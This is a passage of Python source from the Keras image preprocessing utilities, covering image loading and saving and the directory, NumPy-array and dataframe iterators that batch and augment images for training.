if data_format == 'channels_first':
x = x.reshape((1, x.shape[0], x.shape[1]))
else:
x = x.reshape((x.shape[0], x.shape[1], 1))
else:
raise ValueError(f'Unsupported image shape: {x.shape}')
return x
@keras_export('keras.utils.save_img', 'keras.preprocessing.image.save_img')
def save_img(path, x, data_format=None, file_format=None, scale=True, **kwargs):
"""Saves an image stored as a Numpy array to a path or file object.
Args:
path: Path or file object.
x: Numpy array.
data_format: Image data format, either "channels_first" or
"channels_last".
file_format: Optional file format override. If omitted, the format to use
is determined from the filename extension. If a file object was used
instead of a filename, this parameter should always be used.
scale: Whether to rescale image values to be within `[0, 255]`.
**kwargs: Additional keyword arguments passed to `PIL.Image.save()`.
"""
if data_format is None:
data_format = backend.image_data_format()
img = array_to_img(x, data_format=data_format, scale=scale)
if img.mode == 'RGBA' and (file_format == 'jpg' or file_format == 'jpeg'):
warnings.warn('The JPG format does not support '
'RGBA images, converting to RGB.')
img = img.convert('RGB')
img.save(path, format=file_format, **kwargs)
@keras_export('keras.utils.load_img', 'keras.preprocessing.image.load_img')
def load_img(path,
grayscale=False,
color_mode='rgb',
target_size=None,
interpolation='nearest',
keep_aspect_ratio=False):
"""Loads an image into PIL format.
Usage:
```
image = tf.keras.preprocessing.image.load_img(image_path)
input_arr = tf.keras.preprocessing.image.img_to_array(image)
input_arr = np.array([input_arr]) # Convert single image to a batch.
predictions = model.predict(input_arr)
```
Args:
path: Path to image file.
grayscale: DEPRECATED use `color_mode="grayscale"`.
color_mode: One of "grayscale", "rgb", "rgba". Default: "rgb". The desired
image format.
target_size: Either `None` (default to original size) or tuple of ints
`(img_height, img_width)`.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are "nearest", "bilinear", and "bicubic". If PIL version 1.1.3
or newer is installed, "lanczos" is also supported. If PIL version 3.4.0
or newer is installed, "box" and "hamming" are also supported. By
default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target
size without aspect ratio distortion. The image is cropped in
the center with target aspect ratio before resizing.
Returns:
A PIL Image instance.
Raises:
ImportError: if PIL is not available.
ValueError: if interpolation method is not supported.
"""
if grayscale:
warnings.warn('grayscale is deprecated. Please use '
'color_mode = "grayscale"')
color_mode = 'grayscale'
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `load_img` requires PIL.')
if isinstance(path, io.BytesIO):
img = pil_image.open(path)
elif isinstance(path, (pathlib.Path, bytes, str)):
if isinstance(path, pathlib.Path):
path = str(path.resolve())
with open(path, 'rb') as f:
img = pil_image.open(io.BytesIO(f.read()))
else:
raise TypeError('path should be path-like or io.BytesIO'
', not {}'.format(type(path)))
if color_mode == 'grayscale':
# if image is not already an 8-bit, 16-bit or 32-bit grayscale image
# convert it to an 8-bit grayscale image.
if img.mode not in ('L', 'I;16', 'I'):
img = img.convert('L')
elif color_mode == 'rgba':
if img.mode != 'RGBA':
img = img.convert('RGBA')
elif color_mode == 'rgb':
if img.mode != 'RGB':
img = img.convert('RGB')
else:
raise ValueError('color_mode must be "grayscale", "rgb", or "rgba"')
if target_size is not None:
width_height_tuple = (target_size[1], target_size[0])
if img.size != width_height_tuple:
if interpolation not in _PIL_INTERPOLATION_METHODS:
raise ValueError('Invalid interpolation method {} specified. Supported '
'methods are {}'.format(
interpolation,
', '.join(_PIL_INTERPOLATION_METHODS.keys())))
resample = _PIL_INTERPOLATION_METHODS[interpolation]
if keep_aspect_ratio:
width, height = img.size
target_width, target_height = width_height_tuple
crop_height = (width * target_height) // target_width
crop_width = (height * target_width) // target_height
# Set back to input height / width
# if crop_height / crop_width is not smaller.
crop_height = min(height, crop_height)
crop_width = min(width, crop_width)
crop_box_hstart = (height - crop_height) // 2
crop_box_wstart = (width - crop_width) // 2
crop_box_wend = crop_box_wstart + crop_width
crop_box_hend = crop_box_hstart + crop_height
crop_box = [
crop_box_wstart, crop_box_hstart, crop_box_wend, crop_box_hend
]
img = img.resize(width_height_tuple, resample, box=crop_box)
else:
img = img.resize(width_height_tuple, resample)
return img
@keras_export('keras.preprocessing.image.Iterator')
class Iterator(data_utils.Sequence):
"""Base class for image data iterators.
Warning: `tf.keras.preprocessing.image.Iterator` is not recommended for
new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Every `Iterator` must implement the `_get_batches_of_transformed_samples`
method.
Args:
n: Integer, total number of samples in the dataset to loop over.
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seeding for data shuffling.
"""
white_list_formats = ('png', 'jpg', 'jpeg', 'bmp', 'ppm', 'tif', 'tiff')
def __init__(self, n, batch_size, shuffle, seed):
self.n = n
self.batch_size = batch_size
self.seed = seed
self.shuffle = shuffle
self.batch_index = 0
self.total_batches_seen = 0
self.lock = threading.Lock()
self.index_array = None
self.index_generator = self._flow_index()
def _set_index_array(self):
self.index_array = np.arange(self.n)
if self.shuffle:
self.index_array = np.random.permutation(self.n)
def __getitem__(self, idx):
if idx >= len(self):
raise ValueError('Asked to retrieve element {idx}, '
'but the Sequence '
'has length {length}'.format(idx=idx, length=len(self)))
if self.seed is not None:
np.random.seed(self.seed + self.total_batches_seen)
self.total_batches_seen += 1
if self.index_array is None:
self._set_index_array()
index_array = self.index_array[self.batch_size * idx:self.batch_size *
(idx + 1)]
return self._get_batches_of_transformed_samples(index_array)
def __len__(self):
return (self.n + self.batch_size - 1) // self.batch_size # round up
def on_epoch_end(self):
self._set_index_array()
def reset(self):
self.batch_index = 0
def _flow_index(self):
# Ensure self.batch_index is 0.
self.reset()
while 1:
if self.seed is not None:
np.random.seed(self.seed + self.total_batches_seen)
if self.batch_index == 0:
self._set_index_array()
if self.n == 0:
# Avoiding modulo by zero error
current_index = 0
else:
current_index = (self.batch_index * self.batch_size) % self.n
if self.n > current_index + self.batch_size:
self.batch_index += 1
else:
self.batch_index = 0
self.total_batches_seen += 1
yield self.index_array[current_index:current_index + self.batch_size]
def __iter__(self):
# Needed if we want to do something like:
# for x, y in data_gen.flow(...):
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
def next(self):
"""For python 2.x.
Returns:
The next batch.
"""
with self.lock:
index_array = next(self.index_generator)
# The transformation of images is not under thread lock
# so it can be done in parallel
return self._get_batches_of_transformed_samples(index_array)
def _get_batches_of_transformed_samples(self, index_array):
"""Gets a batch of transformed samples.
Args:
index_array: Array of sample indices to include in batch.
Returns:
A batch of transformed samples.
"""
raise NotImplementedError
def _iter_valid_files(directory, white_list_formats, follow_links):
"""Iterates on files with extension.
Args:
directory: Absolute path to the directory
containing files to be counted
white_list_formats: Set of strings containing allowed extensions for
the files to be counted.
follow_links: Boolean, follow symbolic links to subdirectories.
Yields:
Tuple of (root, filename) with extension in `white_list_formats`.
"""
def _recursive_list(subpath):
return sorted(
os.walk(subpath, followlinks=follow_links), key=lambda x: x[0])
for root, _, files in _recursive_list(directory):
for fname in sorted(files):
if fname.lower().endswith('.tiff'):
warnings.warn('Using ".tiff" files with multiple bands '
'will cause distortion. Please verify your output.')
if fname.lower().endswith(white_list_formats):
yield root, fname
def _list_valid_filenames_in_directory(directory, white_list_formats, split,
class_indices, follow_links):
"""Lists paths of files in `subdir` with extensions in `white_list_formats`.
Args:
directory: absolute path to a directory containing the files to list.
The directory name is used as class label
and must be a key of `class_indices`.
white_list_formats: set of strings containing allowed extensions for
the files to be counted.
split: tuple of floats (e.g. `(0.2, 0.6)`) to only take into
account a certain fraction of files in each directory.
E.g.: `segment=(0.6, 1.0)` would only account for last 40 percent
of images in each directory.
class_indices: dictionary mapping a class name to its index.
follow_links: boolean, follow symbolic links to subdirectories.
Returns:
classes: a list of class indices
filenames: the path of valid files in `directory`, relative from
`directory`'s parent (e.g., if `directory` is "dataset/class1",
the filenames will be
`["class1/file1.jpg", "class1/file2.jpg", ...]`).
"""
dirname = os.path.basename(directory)
if split:
all_files = list(
_iter_valid_files(directory, white_list_formats, follow_links))
num_files = len(all_files)
start, stop = int(split[0] * num_files), int(split[1] * num_files)
valid_files = all_files[start:stop]
else:
valid_files = _iter_valid_files(directory, white_list_formats, follow_links)
classes = []
filenames = []
for root, fname in valid_files:
classes.append(class_indices[dirname])
absolute_path = os.path.join(root, fname)
relative_path = os.path.join(dirname,
os.path.relpath(absolute_path, directory))
filenames.append(relative_path)
return classes, filenames
class BatchFromFilesMixin():
"""Adds methods related to getting batches from filenames.
It includes the logic to transform image files to batches.
"""
def set_processing_attrs(self, image_data_generator, target_size, color_mode,
data_format, save_to_dir, save_prefix, save_format,
subset, interpolation, keep_aspect_ratio):
"""Sets attributes to use later for processing files into a batch.
Args:
image_data_generator: Instance of `ImageDataGenerator`
to use for random transformations and normalization.
target_size: tuple of integers, dimensions to resize input images
to.
color_mode: One of `"rgb"`, `"rgba"`, `"grayscale"`.
Color mode to read images.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures
being yielded, in a viewable format. This is useful
for visualizing the random transformations being
applied, for debugging purposes.
save_prefix: String prefix to use for saving sample
images (if `save_to_dir` is set).
save_format: Format to use for saving sample images
(if `save_to_dir` is set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image.
Supported methods are "nearest", "bilinear", and "bicubic".
If PIL version 1.1.3 or newer is installed, "lanczos" is also
supported. If PIL version 3.4.0 or newer is installed, "box" and
"hamming" are also supported. By default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target size
without aspect ratio distortion. The image is cropped in the center
with target aspect ratio before resizing.
"""
self.image_data_generator = image_data_generator
self.target_size = tuple(target_size)
self.keep_aspect_ratio = keep_aspect_ratio
if color_mode not in {'rgb', 'rgba', 'grayscale'}:
raise ValueError('Invalid color mode:', color_mode,
'; expected "rgb", "rgba", or "grayscale".')
self.color_mode = color_mode
self.data_format = data_format
if self.color_mode == 'rgba':
if self.data_format == 'channels_last':
self.image_shape = self.target_size + (4,)
else:
self.image_shape = (4,) + self.target_size
elif self.color_mode == 'rgb':
if self.data_format == 'channels_last':
self.image_shape = self.target_size + (3,)
else:
self.image_shape = (3,) + self.target_size
else:
if self.data_format == 'channels_last':
self.image_shape = self.target_size + (1,)
else:
self.image_shape = (1,) + self.target_size
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.interpolation = interpolation
if subset is not None:
validation_split = self.image_data_generator._validation_split # pylint: disable=protected-access
if subset == 'validation':
split = (0, validation_split)
elif subset == 'training':
split = (validation_split, 1)
else:
raise ValueError('Invalid subset name: %s;'
'expected "training" or "validation"' % (subset,))
else:
split = None
self.split = split
self.subset = subset
def _get_batches_of_transformed_samples(self, index_array):
"""Gets a batch of transformed samples.
Args:
index_array: Array of sample indices to include in batch.
Returns:
A batch of transformed samples.
"""
batch_x = np.zeros((len(index_array),) + self.image_shape, dtype=self.dtype)
# build batch of image data
# self.filepaths is dynamic, is better to call it once outside the loop
filepaths = self.filepaths
for i, j in enumerate(index_array):
img = load_img(
filepaths[j],
color_mode=self.color_mode,
target_size=self.target_size,
interpolation=self.interpolation,
keep_aspect_ratio=self.keep_aspect_ratio)
x = img_to_array(img, data_format=self.data_format)
# Pillow images should be closed after `load_img`,
# but not PIL images.
if hasattr(img, 'close'):
img.close()
if self.image_data_generator:
params = self.image_data_generator.get_random_transform(x.shape)
x = self.image_data_generator.apply_transform(x, params)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
# optionally save augmented images to disk for debugging purposes
if self.save_to_dir:
for i, j in enumerate(index_array):
img = array_to_img(batch_x[i], self.data_format, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(
prefix=self.save_prefix,
index=j,
hash=np.random.randint(1e7),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
# build batch of labels
if self.class_mode == 'input':
batch_y = batch_x.copy()
elif self.class_mode in {'binary', 'sparse'}:
batch_y = np.empty(len(batch_x), dtype=self.dtype)
for i, n_observation in enumerate(index_array):
batch_y[i] = self.classes[n_observation]
elif self.class_mode == 'categorical':
batch_y = np.zeros((len(batch_x), len(self.class_indices)),
dtype=self.dtype)
for i, n_observation in enumerate(index_array):
batch_y[i, self.classes[n_observation]] = 1.
elif self.class_mode == 'multi_output':
batch_y = [output[index_array] for output in self.labels]
elif self.class_mode == 'raw':
batch_y = self.labels[index_array]
else:
return batch_x
if self.sample_weight is None:
return batch_x, batch_y
else:
return batch_x, batch_y, self.sample_weight[index_array]
@property
def filepaths(self):
"""List of absolute paths to image files."""
raise NotImplementedError(
'`filepaths` property method has not been implemented in {}.'.format(
type(self).__name__))
@property
def labels(self):
"""Class labels of every observation."""
raise NotImplementedError(
'`labels` property method has not been implemented in {}.'.format(
type(self).__name__))
@property
def sample_weight(self):
raise NotImplementedError(
'`sample_weight` property method has not been implemented in {}.'
.format(type(self).__name__))
@keras_export('keras.preprocessing.image.DirectoryIterator')
class DirectoryIterator(BatchFromFilesMixin, Iterator):
"""Iterator capable of reading images from a directory on disk.
Warning: `tf.keras.preprocessing.image.DirectoryIterator` is not recommended
for new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
directory: Path to the directory to read images from. Each subdirectory in
this directory will be considered to contain images from one class, or
alternatively you could specify class subdirectories via the `classes`
argument.
image_data_generator: Instance of `ImageDataGenerator` to use for random
transformations and normalization.
target_size: tuple of integers, dimensions to resize input images to.
color_mode: One of `"rgb"`, `"rgba"`, `"grayscale"`. Color mode to read
images.
classes: Optional list of strings, names of subdirectories containing
images from each class (e.g. `["dogs", "cats"]`). It will be computed
automatically if not set.
class_mode: Mode for yielding the targets:
- `"binary"`: binary targets (if there are only two classes),
- `"categorical"`: categorical targets,
- `"sparse"`: integer targets,
- `"input"`: targets are images identical to input images (mainly used
to work with autoencoders),
- `None`: no targets get yielded (only input images are yielded).
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seed for data shuffling.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures being yielded,
in a viewable format. This is useful for visualizing the random
transformations being applied, for debugging purposes.
save_prefix: String prefix to use for saving sample images (if
`save_to_dir` is set).
save_format: Format to use for saving sample images (if `save_to_dir` is
set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are "nearest", "bilinear", and "bicubic". If PIL version 1.1.3
or newer is installed, "lanczos" is also supported. If PIL version 3.4.0
or newer is installed, "box" and "hamming" are also supported. By
default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target size
without aspect ratio distortion. The image is cropped in the center
with target aspect ratio before resizing.
dtype: Dtype to use for generated arrays.
"""
allowed_class_modes = {'categorical', 'binary', 'sparse', 'input', None}
def __init__(self,
directory,
image_data_generator,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
data_format=None,
save_to_dir=None,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest',
keep_aspect_ratio=False,
dtype=None):
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
super().set_processing_attrs(image_data_generator, target_size, color_mode,
data_format, save_to_dir, save_prefix,
save_format, subset, interpolation,
keep_aspect_ratio)
self.directory = directory
self.classes = classes
if class_mode not in self.allowed_class_modes:
raise ValueError('Invalid class_mode: {}; expected one of: {}'
.format(class_mode, self.allowed_class_modes))
self.class_mode = class_mode
self.dtype = dtype
# First, count the number of samples and classes.
self.samples = 0
if not classes:
classes = []
for subdir in sorted(os.listdir(directory)):
if os.path.isdir(os.path.join(directory, subdir)):
classes.append(subdir)
self.num_classes = len(classes)
self.class_indices = dict(zip(classes, range(len(classes))))
pool = multiprocessing.pool.ThreadPool()
# Second, build an index of the images
# in the different class subfolders.
results = []
self.filenames = []
i = 0
for dirpath in (os.path.join(directory, subdir) for subdir in classes):
results.append(
pool.apply_async(_list_valid_filenames_in_directory,
(dirpath, self.white_list_formats, self.split,
self.class_indices, follow_links)))
classes_list = []
for res in results:
classes, filenames = res.get()
classes_list.append(classes)
self.filenames += filenames
self.samples = len(self.filenames)
self.classes = np.zeros((self.samples,), dtype='int32')
for classes in classes_list:
self.classes[i:i + len(classes)] = classes
i += len(classes)
print('Found %d images belonging to %d classes.' %
(self.samples, self.num_classes))
pool.close()
pool.join()
self._filepaths = [
os.path.join(self.directory, fname) for fname in self.filenames
]
super().__init__(self.samples, batch_size, shuffle, seed)
@property
def filepaths(self):
return self._filepaths
@property
def labels(self):
return self.classes
@property # mixin needs this property to work
def sample_weight(self):
# no sample weights will be returned
return None
@keras_export('keras.preprocessing.image.NumpyArrayIterator')
class NumpyArrayIterator(Iterator):
"""Iterator yielding data from a Numpy array.
Warning: `tf.keras.preprocessing.image.NumpyArrayIterator` is not recommended
for new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Numpy array of input data or tuple. If tuple, the second elements is
either another numpy array or a list of numpy arrays, each of which gets
passed through as an output without any modifications.
y: Numpy array of targets data.
image_data_generator: Instance of `ImageDataGenerator` to use for random
transformations and normalization.
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
sample_weight: Numpy array of sample weights.
seed: Random seed for data shuffling.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures being yielded,
in a viewable format. This is useful for visualizing the random
transformations being applied, for debugging purposes.
save_prefix: String prefix to use for saving sample images (if
`save_to_dir` is set).
save_format: Format to use for saving sample images (if `save_to_dir` is
set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
ignore_class_split: Boolean (default: False), ignore difference
in number of classes in labels across train and validation
split (useful for non-classification tasks)
dtype: Dtype to use for the generated arrays.
"""
def __init__(self,
x,
y,
image_data_generator,
batch_size=32,
shuffle=False,
sample_weight=None,
seed=None,
data_format=None,
save_to_dir=None,
save_prefix='',
save_format='png',
subset=None,
ignore_class_split=False,
dtype=None):
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
self.dtype = dtype
if isinstance(x, tuple) or isinstance(x, list):
if not isinstance(x[1], list):
x_misc = [np.asarray(x[1])]
else:
x_misc = [np.asarray(xx) for xx in x[1]]
x = x[0]
for xx in x_misc:
if len(x) != len(xx):
raise ValueError('All of the arrays in `x` '
'should have the same length. '
'Found a pair with: len(x[0]) = %s, len(x[?]) = %s' %
(len(x), len(xx)))
else:
x_misc = []
if y is not None and len(x) != len(y):
raise ValueError('`x` (images tensor) and `y` (labels) '
'should have the same length. '
'Found: x.shape = %s, y.shape = %s' %
(np.asarray(x).shape, np.asarray(y).shape))
if sample_weight is not None and len(x) != len(sample_weight):
raise ValueError('`x` (images tensor) and `sample_weight` '
'should have the same length. '
'Found: x.shape = %s, sample_weight.shape = %s' %
(np.asarray(x).shape, np.asarray(sample_weight).shape))
if subset is not None:
if subset not in {'training', 'validation'}:
raise ValueError('Invalid subset name:', subset,
'; expected "training" or "validation".')
split_idx = int(len(x) * image_data_generator._validation_split)
if (y is not None and not ignore_class_split and not np.array_equal(
np.unique(y[:split_idx]), np.unique(y[split_idx:]))):
raise ValueError('Training and validation subsets '
'have different number of classes after '
'the split. If your numpy arrays are '
'sorted by the label, you might want '
'to shuffle them.')
if subset == 'validation':
x = x[:split_idx]
x_misc = [np.asarray(xx[:split_idx]) for xx in x_misc]
if y is not None:
y = y[:split_idx]
else:
x = x[split_idx:]
x_misc = [np.asarray(xx[split_idx:]) for xx in x_misc]
if y is not None:
y = y[split_idx:]
self.x = np.asarray(x, dtype=self.dtype)
self.x_misc = x_misc
if self.x.ndim != 4:
raise ValueError(
'Input data in `NumpyArrayIterator` '
'should have rank 4. You passed an array '
'with shape', self.x.shape)
channels_axis = 3 if data_format == 'channels_last' else 1
if self.x.shape[channels_axis] not in {1, 3, 4}:
warnings.warn('NumpyArrayIterator is set to use the '
'data format convention "' + data_format + '" '
'(channels on axis ' + str(channels_axis) +
'), i.e. expected either 1, 3, or 4 '
'channels on axis ' + str(channels_axis) + '. '
'However, it was passed an array with shape ' +
str(self.x.shape) + ' (' +
str(self.x.shape[channels_axis]) + ' channels).')
if y is not None:
self.y = np.asarray(y)
else:
self.y = None
if sample_weight is not None:
self.sample_weight = np.asarray(sample_weight)
else:
self.sample_weight = None
self.image_data_generator = image_data_generator
self.data_format = data_format
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
super().__init__(x.shape[0], batch_size, shuffle, seed)
def _get_batches_of_transformed_samples(self, index_array):
batch_x = np.zeros(
tuple([len(index_array)] + list(self.x.shape)[1:]), dtype=self.dtype)
for i, j in enumerate(index_array):
x = self.x[j]
params = self.image_data_generator.get_random_transform(x.shape)
x = self.image_data_generator.apply_transform(
x.astype(self.dtype), params)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
if self.save_to_dir:
for i, j in enumerate(index_array):
img = array_to_img(batch_x[i], self.data_format, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(
prefix=self.save_prefix,
index=j,
hash=np.random.randint(1e4),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
batch_x_miscs = [xx[index_array] for xx in self.x_misc]
output = (batch_x if not batch_x_miscs else [batch_x] + batch_x_miscs,)
if self.y is None:
return output[0]
output += (self.y[index_array],)
if self.sample_weight is not None:
output += (self.sample_weight[index_array],)
return output
def validate_filename(filename, white_list_formats):
"""Check if a filename refers to a valid file.
Args:
filename: String, absolute path to a file
white_list_formats: Set, allowed file extensions
Returns:
A boolean value indicating if the filename is valid or not
"""
return (filename.lower().endswith(white_list_formats) and
os.path.isfile(filename))
class DataFrameIterator(BatchFromFilesMixin, Iterator):
"""Iterator capable of reading images from a directory on disk as a dataframe.
Args:
dataframe: Pandas dataframe containing the filepaths relative to
`directory` (or absolute paths if `directory` is None) of the images in
a string column. It should include other column/s depending on the
`class_mode`: - if `class_mode` is `"categorical"` (default value) it
must include the `y_col` column with the class/es of each image.
Values in column can be string/list/tuple if a single class or
list/tuple if multiple classes. - if `class_mode` is `"binary"` or
`"sparse"` it must include the given `y_col` column with class values
as strings. - if `class_mode` is `"raw"` or `"multi_output"` it should
contain the columns specified in `y_col`. - if `class_mode` is
`"input"` or `None` no extra column is needed.
directory: string, path to the directory to read images from. If `None`,
data in `x_col` column should be absolute paths.
image_data_generator: Instance of `ImageDataGenerator` to use for random
transformations and normalization. If None, no transformations and
normalizations are made.
x_col: string, column in `dataframe` that contains the filenames (or
absolute paths if `directory` is `None`).
y_col: string or list, column/s in `dataframe` that has the target data.
weight_col: string, column in `dataframe` that contains the sample
weights. Default: `None`.
target_size: tuple of integers, dimensions to resize input images to.
color_mode: One of `"rgb"`, `"rgba"`, `"grayscale"`. Color mode to read
images.
classes: Optional list of strings, classes to use (e.g. `["dogs",
"cats"]`). If None, all classes in `y_col` will be used.
class_mode: one of "binary", "categorical", "input", "multi_output",
"raw", "sparse" or None. Default: "categorical".
Mode for yielding the targets:
- `"binary"`: 1D numpy array of binary labels,
- `"categorical"`: 2D numpy array of one-hot encoded labels. Supports
multi-label output.
- `"input"`: images identical to input images (mainly used to work
with autoencoders),
- `"multi_output"`: list with the values of the different columns,
- `"raw"`: numpy array of values in `y_col` column(s),
- `"sparse"`: 1D numpy array of integer labels, - `None`, no targets
are returned (the generator will only yield batches of image data,
which is useful to use in `model.predict()`).
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seed for data shuffling.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures being yielded,
in a viewable format. This is useful for visualizing the random
transformations being applied, for debugging purposes.
save_prefix: String prefix to use for saving sample images (if
`save_to_dir` is set).
save_format: Format to use for saving sample images (if `save_to_dir` is
set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are "nearest", "bilinear", and "bicubic". If PIL version 1.1.3
or newer is installed, "lanczos" is also supported. If PIL version 3.4.0
or newer is installed, "box" and "hamming" are also supported. By
default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target size
without aspect ratio distortion. The image is cropped in the center
with target aspect ratio before resizing.
dtype: Dtype to use for the generated arrays.
validate_filenames: Boolean, whether to validate image filenames in
`x_col`. If `True`, invalid images will be ignored. Disabling this
option can lead to speed-up in the instantiation of this class. Default:
`True`.
"""
allowed_class_modes = {
'binary', 'categorical', 'input', 'multi_output', 'raw', 'sparse', None
}
def __init__(self,
dataframe,
directory=None,
image_data_generator=None,
x_col='filename',
y_col='class',
weight_col=None,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
data_format='channels_last',
save_to_dir=None,
save_prefix='',
save_format='png',
subset=None,
interpolation='nearest',
keep_aspect_ratio=False,
dtype='float32',
validate_filenames=True):
super().set_processing_attrs(image_data_generator, target_size, color_mode,
data_format, save_to_dir, save_prefix,
save_format, subset, interpolation,
keep_aspect_ratio)
df = dataframe.copy()
self.directory = directory or ''
self.class_mode = class_mode
self.dtype = dtype
# check that inputs match the required class_mode
self._check_params(df, x_col, y_col, weight_col, classes)
if validate_filenames: # check which image files are valid and keep them
df = self._filter_valid_filepaths(df, x_col)
if class_mode not in ['input', 'multi_output', 'raw', None]:
df, classes = self._filter_classes(df, y_col, classes)
num_classes = len(classes)
# build an index of all the unique classes
self.class_indices = dict(zip(classes, range(len(classes))))
# retrieve only training or validation set
if self.split:
num_files = len(df)
start = int(self.split[0] * num_files)
stop = int(self.split[1] * num_files)
df = df.iloc[start:stop, :]
# get labels for each observation
if class_mode not in ['input', 'multi_output', 'raw', None]:
self.classes = self.get_classes(df, y_col)
self.filenames = df[x_col].tolist()
self._sample_weight = df[weight_col].values if weight_col else None
if class_mode == 'multi_output':
self._targets = [np.array(df[col].tolist()) for col in y_col]
if class_mode == 'raw':
self._targets = df[y_col].values
self.samples = len(self.filenames)
validated_string = 'validated' if validate_filenames else 'non-validated'
if class_mode in ['input', 'multi_output', 'raw', None]:
print(f'Found {self.samples} {validated_string} image filenames.')
else:
print(f'Found {self.samples} {validated_string} image filenames '
f'belonging to {num_classes} classes.')
self._filepaths = [
os.path.join(self.directory, fname) for fname in self.filenames
]
super().__init__(self.samples, batch_size, shuffle, seed)
def _check_params(self, df, x_col, y_col, weight_col, classes):
# check class mode is one of the currently supported
if self.class_mode not in self.allowed_class_modes:
raise ValueError('Invalid class_mode: {}; expected one of: {}'.format(
self.class_mode, self.allowed_class_modes))
# check that y_col has several column names if class_mode is multi_output
if (self.class_mode == 'multi_output') and not isinstance(y_col, list):
raise TypeError(
'If class_mode="{}", y_col must be a list. Received {}.'.format(
self.class_mode,
type(y_col).__name__))
# check that filenames/filepaths column values are all strings
if not all(df[x_col].apply(lambda x: isinstance(x, str))):
raise TypeError(
'All values in column x_col={} must be strings.'.format(x_col))
# check labels are string if class_mode is binary or sparse
if self.class_mode in {'binary', 'sparse'}:
if not all(df[y_col].apply(lambda x: isinstance(x, str))):
raise TypeError('If class_mode="{}", y_col="{}" column '
'values must be strings.'.format(
self.class_mode, y_col))
# check that if binary there are only 2 different classes
if self.class_mode == 'binary':
if classes:
classes = set(classes)
if len(classes) != 2:
raise ValueError('If class_mode="binary" there must be 2 '
'classes. {} class/es were given.'.format(
len(classes)))
elif df[y_col].nunique() != 2:
raise ValueError('If class_mode="binary" there must be 2 classes. '
'Found {} classes.'.format(df[y_col].nunique()))
# check values are string, list or tuple if class_mode is categorical
if self.class_mode == 'categorical':
types = (str, list, tuple)
if not all(df[y_col].apply(lambda x: isinstance(x, types))):
raise TypeError('If class_mode="{}", y_col="{}" column '
'values must be type string, list or tuple.'.format(
self.class_mode, y_col))
# raise warning if classes are given but will be unused
if classes and self.class_mode in {'input', 'multi_output', 'raw', None}:
warnings.warn(
'`classes` will be ignored given the class_mode="{}"'.format(
self.class_mode))
# check that if weight column that the values are numerical
if weight_col and not issubclass(df[weight_col].dtype.type, np.number):
raise TypeError(
'Column weight_col={} must be numeric.'.format(weight_col))
def get_classes(self, df, y_col):
labels = []
for label in df[y_col]:
if isinstance(label, (list, tuple)):
labels.append([self.class_indices[lbl] for lbl in label])
else:
labels.append(self.class_indices[label])
return labels
@staticmethod
def _filter_classes(df, y_col, classes):
df = df.copy()
def remove_classes(labels, classes):
if isinstance(labels, (list, tuple)):
labels = [cls for cls in labels if cls in classes]
return labels or None
elif isinstance(labels, str):
return labels if labels in classes else None
else:
raise TypeError(
'Expect string, list or tuple but found {} in {} column '.format(
type(labels), y_col))
if classes:
# prepare for membership lookup
classes = list(collections.OrderedDict.fromkeys(classes).keys())
